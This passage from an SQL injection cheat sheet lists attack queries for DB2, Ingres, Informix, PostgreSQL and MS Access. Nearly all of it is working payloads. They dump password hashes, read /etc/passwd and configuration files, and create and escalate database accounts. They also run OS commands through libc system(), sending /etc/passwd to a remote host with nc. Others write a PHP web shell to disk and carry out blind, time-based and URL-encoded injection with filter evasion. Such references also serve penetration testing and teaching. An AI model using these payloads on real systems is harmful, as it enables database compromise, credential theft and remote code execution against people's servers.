Serialize XML: For Error Based	 SELECT xmlagg(xmlrow(table_schema)) FROM sysibm.tables; This command returns all in one xml-formatted string. SELECT xmlagg(xmlrow(table_schema)) FROM (SELECT distinct(table_schema) FROM sysibm.tables);
Default Databases	 SYSIBM SYSCAT SYSSTAT SYSPUBLIC SYSIBMADM SYSTOOLS

Location of DB Files	 SELECT * FROM sysibmadm.reg_variables WHERE reg_var_name='DB2PATH'; This command obtains the location of DB files.
Privileges	 select * from syscat.tabauth; This command obtains all the users having privileges on a particular table or view in the database
	 select * from syscat.dbauth where grantee = current user; This command obtains the current user having privileges on a particular table or view in the database.
	select * from syscat.tabauth where grantee = current user;
	 This command obtains the current user having table and view privileges.
	select * from SYSIBM.SYSUSERAUTH;
	 This command lists the users with system privileges.

5. Ingres SQL Database

Query	Command
Version	 SELECT dbmsinfo('_version'); This command retrieves the system information of the current
	installation of SQL Database.
	First connect to <i>iidbdb</i> , then
List Users	 SELECT name, password FROM iiuser; This command retrieves the columns 'name' and 'password' from the table 'iiuser'.
	■ SELECT own FROM iidatabase;
	— This command lists the names of users from the table 'iidatabase'.
	select dbmsinfo('session_user');
Current User	select dbmsinfo('system_user');
	— These commands return the user id of the current user.
List all	■ SELECT name FROM iidatabase;
Database	—This command obtains a column name 'name' having a list of databases from the table 'iidatabase'.
Current	<pre>select dbmsinfo('database');</pre>
Database	This command obtains the current SQL database.
	SELECT table_name, table_owner FROM iitables;
	 This command obtains the columns 'table_name' and 'table_owner' from the table 'iitables'.
	SELECT relid, relowner, relloc FROM iirelation;
List Tables	 This command obtains the columns 'relid', 'relowner' and 'relloc' from the table 'iirelation'.
	 SELECT relid, relowner, relloc FROM iirelation WHERE relowner != '\$ingres';
	— This command obtains the columns 'relid', 'relowner' and 'relloc' from the table 'iirelation' having 'relowner' value as !='\$ingres'.
List Call as a	 SELECT column_name, column_datatype, table_name, table_owner FROM iicolumns;
List Column	— This command lists columns 'column_name', 'column_datatype', 'table_name' and 'table_owner' from the table 'iicolumns'.

Select Nth Row	 This functionality is not possible, but following command can be used to some extent: get:select top 10 blah from table; This command obtains first 10 blah form table.
Select Nth Char	select substr('abc', 2, 1);— This command returns 'b'.
Comments	 SELECT 123; This command is used for writing a comment. SELECT 123; /* comment */ This command is used to comment out a statement.
List Password Hashes	 First connect to <i>iidbdb</i>, then: select name, password from iiuser; This command obtains password hashes from table 'iiuser'.
Hostname, IP Address	 SELECT dbmsinfo('ima_server') This command obtains the Hostname and IP address of a system.
Logging in from Command Line	 \$ su - ingres \$ sql iidbdb * select dbmsinfo('_version'); go — This command can be used to log in from command line.
Default Databases	 SELECT name FROM iidatabase WHERE own = '\$ingres'; This command lists the databases from 'iidatabase'.
Location of DB Files	 SELECT dbdev, ckpdev, jnldev, sortdev FROM iidatabase WHERE name = 'value'; This command obtains primary location of db. SELECT Iname FROM iiextend WHERE dname = 'value'; This command obtains extended location of db. SELECT are FROM iilocations where Iname = 'value'; This command obtains all area (i.e. directory) linked with a location.
Privileges	 SELECT dbmsinfo('db_admin'); This command retrieves the users with 'db_admin' privilege. SELECT dbmsinfo('create_table'); This command retrieves the users with 'create_table' privilege. SELECT dbmsinfo('create_procedure'); This command retrieves the users with 'create_procedure' privilege.

- SELECT dbmsinfo('security_priv');
 - This command retrieves the users with 'security_priv' privilege.
- SELECT dbmsinfo('SELECT_syscat');
 - This command retrieves the users with 'SELECT_syscat' privilege.
- SELECT dbmsinfo('db_privileges');
 - This command retrieves the users with 'db_privileges' privilege.
- SELECT dbmsinfo('current_priv_mask');
 - This command retrieves the users with 'current_priv_mask' privilege.

6. Informix SQL Database

Query	Command
Version	 SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1; This command retrieves the version and complete information from the table 'systables' having tabid value as '1'. SELECT DBINFO('version', 'server-type') FROM systables WHERE tabid = 1; This command retrieves the version and server information from the table 'systables' having tabid value as '1'. SELECT DBINFO('version', 'major'), DBINFO('version', 'minor'), DBINFO('version', 'level') FROM systables WHERE tabid = 1;
	 This command retrieves the version, major and minor information from the table 'systables' having tabid value as '1'. SELECT DBINFO('version', 'os') FROM systables WHERE tabid = 1; This command retrieves the version and OS information from the table 'systables' having tabid value as '1'.
List Users	 SELECT username, usertype, password from sysusers; This command lists the usernames, usertype and password from the table sysusers.
Current User	 SELECT USER FROM systables WHERE tabid = 1; This command obtains the column 'USER' from table 'systables' having tabid value as '1'. SELECT CURRENT_ROLE FROM systables WHERE tabid = 1; This command obtains the column 'CURRENT_ROLE' from table 'systables' having tabid value as '1'.
List all Database	 SELECT name, owner from sysdatabases; This command obtains the list of all the databases from the database 'sysdatabases'.
Current Database	 SELECT DBSERVERNAME FROM systables where tabid = 1; This command obtains the column 'DBSERVERNAME' current server name from table 'systable' having tabid value as '1'.
List Tables	 SELECT tabname, owner FROM systables; This command obtains the columns 'tabname' and 'owner' from table 'systable'. SELECT tabname, viewtext FROM sysviews JOIN systables ON systables.tabid = sysviews.tabid;

	 This command selects columns 'tabname' and 'viewtext' from the table 'sysviews' and joins with the same columns of table 'systables', condition being 'systables.tabid=sysviews.tabid'.
List Columns	 SELECT tabname, colname, owner, coltype FROM syscolumns JOIN systables ON syscolumns.tabid = systables.tabid; This command selects columns 'tabname', 'colname', 'owner', and 'coltype' from the table 'syscolumns' and joins with the same columns of table 'systables', condition being 'syscolumns.tabid=systables.tabid'.
Select Nth Row	 SELECT first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; This command retrieves the 10th row.
Select Nth Char	 SELECT SUBSTRING('ABCD' FROM 3 FOR 1) FROM systables where tabid = 1; This command returns 'C'.
Case Statement	 SELECT tabid, case when tabid>10 then "High" else 'Low' end from systables; This command returns "High" for columns 'tabid' and 'case', if tabid is greater than 10 else returns "Low".
Comments	 select 1 FROM systables WHERE tabid = 1; This command is used for writing a comment.
Hostname, IP Address	 SELECT DBINFO('dbhostname') FROM systables WHERE tabid = 1; This command returns hostname and IP address information from table 'systables' having tabid value as '1'.
Default Databases	These are the system databases: sysmaster ysadmin* ysuser* ysutils*
Privileges	 SELECT tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; This command is used to find out that which user has access to which table. SELECT procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; This command is used to find out that which user has access to which procedures.

7. Postgre SQL Database

Query	Command
Version	 SELECT version(); This command obtains the version and built information of a database.
List Users	 SELECT usename FROM pg_user; This command obtains the column 'usename' from the table 'pg_user'.
Create DB Accounts	This command is used to create database accounts • CREATE USER victor WITH PASSWORD 'pass123'
Current User	 SELECT user; This command obtains a name of recently logged in user. SELECT current_user; This command obtains a name of current user. SELECT session_user;
List all Database	 SELECT datname FROM pg_database; This command obtains the list of database in column 'datname' from table 'pg_database'.
Current Database	 SELECT current_database(); This command obtains the current database.
Load File	 SELECT pg_read_file('global/pg_hba.conf',0,10000000); This command is used to read only the content of the DATA directory.
List Tables	 SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r',") AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid); — This command lists the tables present in the database.

List Columns	 SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public'); This command lists the columns present in the database.
Select Nth Row	 SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; This command returns rows numbered from 0. SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1; This command returns rows numbered from 1.
Select Nth Char	 SELECT substr('abcd', 3, 1); This command returns c.
If Statement	 IF statements only seem valid inside functions, therefore they are of less use in SQL injection statement. See CASE statement instead.
Case Statement	 SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; This command returns A.
Comments	 SELECT 1; This command is used for writing a comment. SELECT /*comment*/1; This command is used to comment out a statement.
String without Quotes	 SELECT (CHAR(75) CHAR(76) CHAR(77)) This command will return 'KLM'.
Time Delay	 SELECT pg_sleep(10); This command triggers a measurable sleep time. In postgres is 8.2+ only. CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(10); This command is to create your own sleep function.
Command Execution	 CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; — priv SELECT system('cat /etc/passwd nc 10.0.0.1 8080'); — This commands run as postgres/pgsql OS-level user.

	 Generally, not it is not applicable in postgres. However, if <u>contrib/dblink</u>is installed (it isn't by default) it can be used to resolve hostnames (assuming you have DBA rights):
Make DNS Requests	 SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version()') RETURNS (result TEXT);
	Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. "ping pentestmonkey.net".
Remote Authentication	 You should add "host" record to the pg_hba.conf file located in the DATA directory.
	host all all 192.168.20.0/24 md5;
List Passwords	SELECT pg_read_file('global/pg_auth',0,10000000);
List Fasswords	 This command lists passwords from a given database.
List Password	SELECT usename, passwd FROM pg_shadow;
Hashes	 This command is used obtain password hashes from a given database.
	 To read data from local files, first you should create a temporary file for that. Read file contents into this table, then read the data from table.
	CREATE TABLE temptable(t text);
	COPY temptable FROM 'c:/boot.ini';
Rulk Incort	SELECT * FROM temptable LIMIT 1 OFFSET 0
Bulk Insert	This functionality needs permissions for the service user who has been running database service. On default, it is not possible to read local files on Windows systems because postgres user doesn't have read permissions.
	 Drop the temporary file after exploitation.
	DROP TABLE temptable;
Create Users	CREATE USER test1 PASSWORD 'pass1';
	 This command creates a user name 'USER test1' having password 'pass1'.
	 CREATE USER test1 PASSWORD 'pass1' CREATEUSER;
	 This command creates a user name 'USER test1' having password 'pass1' and at the same time privileges are granted the user.
D 11	■ DROP USER test1;
Drop User	 This command drops user name 'USER test1'.

List DBA	 SELECT usename FROM pg_user WHERE usesuper IS TRUE
Accounts	 This command obtains a list of user names with DBA privileges.
Make User	 ALTER USER test1 CREATEUSER CREATEDB;
DBA	 This command grants DBA privileges to a user name 'USER test1'.
	 CREATE TABLE mydata(t text); COPY mydata FROM '/etc/passwd';
	— priv, can read files which are readable by postgres OS-level user
	' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1;
	 This command gets data back one row at a time.
	' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2;
Local File	— This command gets data back one row at a time.
Access	DROP TABLE mytest mytest; Write to a file:
	 This command drops a table and then write it to another text file.
	 CREATE TABLE mytable (mycol text); INSERT INTO mytable(mycol) VALUES ('<? pasthru(\$_GET[cmd]); ?>'); COPY mytable (mycol) TO '/tmp/test.php';
	— priv, write files as postgres OS-level user. Generally, you will not be able to write to the web root.
	 priv user can also read/write files by mapping libc functions.
	SELECT inet_server_addr();
Hostname, IP	 This command returns db server IP address (or null if using local connection).
Address	SELECT inet_server_port();
	 This command returns db server IP address (or null if using local connection)
Error Based SQLi Attack: To throw	 cast((chr(95) current_database()) as numeric); This command is used to receive integer inputs. ' cast((chr(95) current_database()) as numeric) ';
Conversion Errors	 This command is used to receive string inputs.
Clear SQLi	■ product.php?id=4
Tests:	■ product.php?id=5-1
For Boolean	■ product.php?id=4 OR 1=1
SQL Injection	■ product.php?id=-1 OR 17-7=10
and Silent Attacks	 These commands can be used as tests for Boolean SQL injection and silent attacks.

Time Based SQLi Exploitation	?vulnerableParam=-1; SELECT CASE WHEN (COALESCE(ASCII(SUBSTR(({INJECTION}),1,1)),0) > 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1+; {INJECTION} = You want to run the query. — If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.
Default Databases	template0template1
Path of DB Files	 SELECT current_setting('data_directory'); This command returns the path of data_directory (C:/Program Files/PostgreSQL/8.3/data) SELECT current_setting('hba_file'); This command returns the path of hba_file (C:/Program Files/PostgreSQL/8.3/data/pg_hba.conf)
Location of DB Files	 SELECT current_setting('data_directory'); This command returns the location of the data_directory. SELECT current_setting('hba_file'); This command returns the location of the hba_file.
Privileges	 SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user This command returns the user names along with their privileges from the table 'pg_user'.

8. MS ACCESS Database

Query	Command
List Tables	 SELECT Name FROM msysobjects WHERE Type = 1; This command retrieves column name 'Name' from the table 'msysobjects' having type value as '1'.
Create DB Accounts	This command is used to create database accounts • CREATE USER victor IDENTIFIED BY 'pass123'
Query Comment	Comment characters are not available in Microsoft Access. However, it is possible to remove useless part of a query with the NULL char (%00). A query truncation looks like: http://localhost/script.asp?id=1'+UNION+SELECT+1,2,3,4+FROM+someValidTabName%00;
Syntax Error Messages	 Apache (PHP): Fatal error: Uncaught exception 'com_exception' with message 'Source: Microsoft JET Database Engine Description: []; IIS (ASP):
Stacked Query	Stacked queries are not allowed.
Sub Query	Subqueries are supported by MS Access. In the following example, TOP 1 is used to return one row only: http://localhost/script.asp?id=1'+AND+(SELECT+TOP+1+'someData'+ FROM+table)%00;
Hardcoded Query Returning 0 Rows	In some cases, it is useful to include in the web application response the outcome of our UNION SELECT query only, making the hardcoded query returning 0 results. A common trick can be used for our purpose: http://localhost/script.asp?id=1'+AND+1=0+UNION+SELECT+1,2,3+F ROM+table%00;
Limit Support	 The LIMIT operator is not implemented within MS Access. However, it is possible to limit SELECT query results to the first N table rows using the TOP operator. TOP accepts as argument an integer, representing the number of rows to be returned. http://localhost/script.asp?id=1'+UNION+SELECT+TOP+3+someAttrN ame+FROM+validTable%00; In the above example, In addition to TOP, the operator LAST can be used to fully emulate the behavior of LIMIT.

String Length	http://localhost/script.asp?id=1'+UNION+SELECT+LEN('1234')+FRO M+table%00;
	This request above returns 4, the length of the string "1234".
	http://localhost/script.asp?id=1'+UNION+SELECT+MID('abcd',1,1)+F ROM+table%00;
Substring	http://localhost/script.asp?id=1'+UNION+SELECT+MID('abcd',2,1)+F ROM+table%00;
Substring	 The operator MID can be used to select a portion of a specified string
	 The first query returns the character 'a', whereas the second query returns 'b'.
	http://localhost/script.asp?id=1'+UNION+SELECT+'web'+%2b+'app'+ FROM+table%00;
String Concatenation	http://localhost/script.asp?id=1'+UNION+SELECT+'web'+%26+'app'+ FROM+table%00;
	- &(%26) and + (%2b) characters are used for string concatenation.
	Both queries return the string "webapp".
	IIF(condition, true, false);
IF THEN	http://localhost/script.asp?id=1'+UNION+SELECT+IIF(1=1,'a','b')+FR OM+table%00;
Conditional Statement	 The IIF operator can be used to build an "if-then" conditional statement. As shown below, the syntax for this function is simple:
	 This command returns the character 'a' as the condition 1=1 is always true.
Web Root	http://localhost/script.asp?id=1'+'+UNION+SELECT+1+FROM+FakeD B.FakeTable%00;
Directory Full Path	 Using the above request, MS Access responds with an error message containing the web directory full pathname.
Char from ASCII Value	■ The CHR operator converts the argument character to its ASCII value: http://localhost/script.asp?id=1'+UNION+SELECT+CHR(65)+FROM+t able%00;
	— This command returns the character 'A'.
ASCII Valera	The ASC operator returns the ASCII value of the character passed as argument:
ASCII Value from Char	<pre>http://localhost/script.asp?id=1'+UNION+SELECT+ASC('A')+FROM+ta ble%00;</pre>
	— This command returns 65, the ASCII value of the character 'A'.

	■ Database file name (.mdb) can be inferred with the following query:
.mdb File Name Guessing	<pre>http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i]. realTable%00;</pre>
	— Where name[i] is a .mdb filename and realTable is an existent table within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.
.mdb Password Cracker	 Access PassView is a free utility that can be used to recover the main database password of Microsoft Access 95/97/2000/XP or Jet Database Engine 3.0/4.0
Union Operator	MS Access supports UNION and UNION ALL operators, although they require an existent table name within the FROM clause of the SELECT query. Table brute forcing can be used to obtain a valid table name. Please refer to last section (Another Bruteforcing Technique) of this document.
	http://localhost/script.asp?id=1'+UNION+SELECT+name+FROM+msy sobjects+IN+'\boot.ini'%00;
	 By implementing the above request, if the specified file exists, MS Access triggers an error message informing that the database format is invalid
File Enumeration	 Another way to enumerate files consists into specifying a database.table item
	<pre>http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+C:\\boot .ini.TableName%00;</pre>
	 By implementing the above command, if the specified file exists, MS Access displays a database format error message
Table Fields Enumeration	Table fields can be enumerated with a simple trick. First of all, it is necessary to find a valid table name. If error messages are not concealed, the name of table is usually included in the error messages. Let's assume that <i>id</i> is a valid table name.
	At this stage, we can use a well-known MS SQL server technique to enumerate all table fields.
	http://localhost/script.asp?id=1'+GROUP+BY+ID%00;
	 As the system will now respond with a slightly different error message including another field name, we can proceed with the following:
	http://localhost/script.asp?id=1'+GROUP+BY+ID,FIELD2%00;

	 Consequently, this process can be repeated several times until all field names have been uncovered. Note that it is not possible to use this technique if you are dealing with query like "SELECT * FROM"
	The total number of rows in a table can be discovered with the query:
Table Rows Counting	http://localhost/script.asp?id=1'+AND+IIF((SELECT+COUNT(*)+FRO M+validTableName)=X,1,0)%00;
	 In the following, TAB_LEN is the discovered number of rows.
Filters Evasion	Backslash escaped input filtering can be easily bypassed in MS Access. Escaping user's inputs by adding backslashes is not enough in order to prevent SQL injection as the character '\' is the integer divide operator. A clever example of bypass has been already discussed here.
	 Using our favorite scripting language, it is possible to iterate on all wordlist items using the query:
Table and	<pre>http://localhost/script.asp?id=1'+AND+(SELECT+TOP+1+FROM+\$wor dlist)%00;</pre>
Table and Field Names Brute forcing	 If the \$\mathcal{\$wordlist}\$ item exists, the web application should display a standard HTML response.
brute forcing	 Once obtained a valid table name, we can guess a field name in a similar way:
	<pre>http://localhost/script.asp?id=1'+AND+(SELECT+TOP+1+FieldName[i]+FROM+validTableName)%00;</pre>
	Assuming that we have already discovered the vulnerable 'id' field, the table name and the field name, we can proceed using the following query:
Blind SQL Injection	http://localhost/index.asp?id=IIF((select%20mid(last(username),1,1)%20 from%20(select%20top%2010%20username%20from%20users))='a',0,'ko');
	In a nutshell, the query uses an "if-then" statement in order to trigger a "200 OK" in case of success or a "500 Internal Error" otherwise. Taking advantage of the TOP 10 operator, it is possible to select the first ten results. The subsequent usage of LAST allows to consider the 10th tuple only.
	 On such value, using the MID operator, it is possible to perform a simple character comparison.
	 Properly changing the index of MID and TOP, we can dump the content of the "username" field for all rows.
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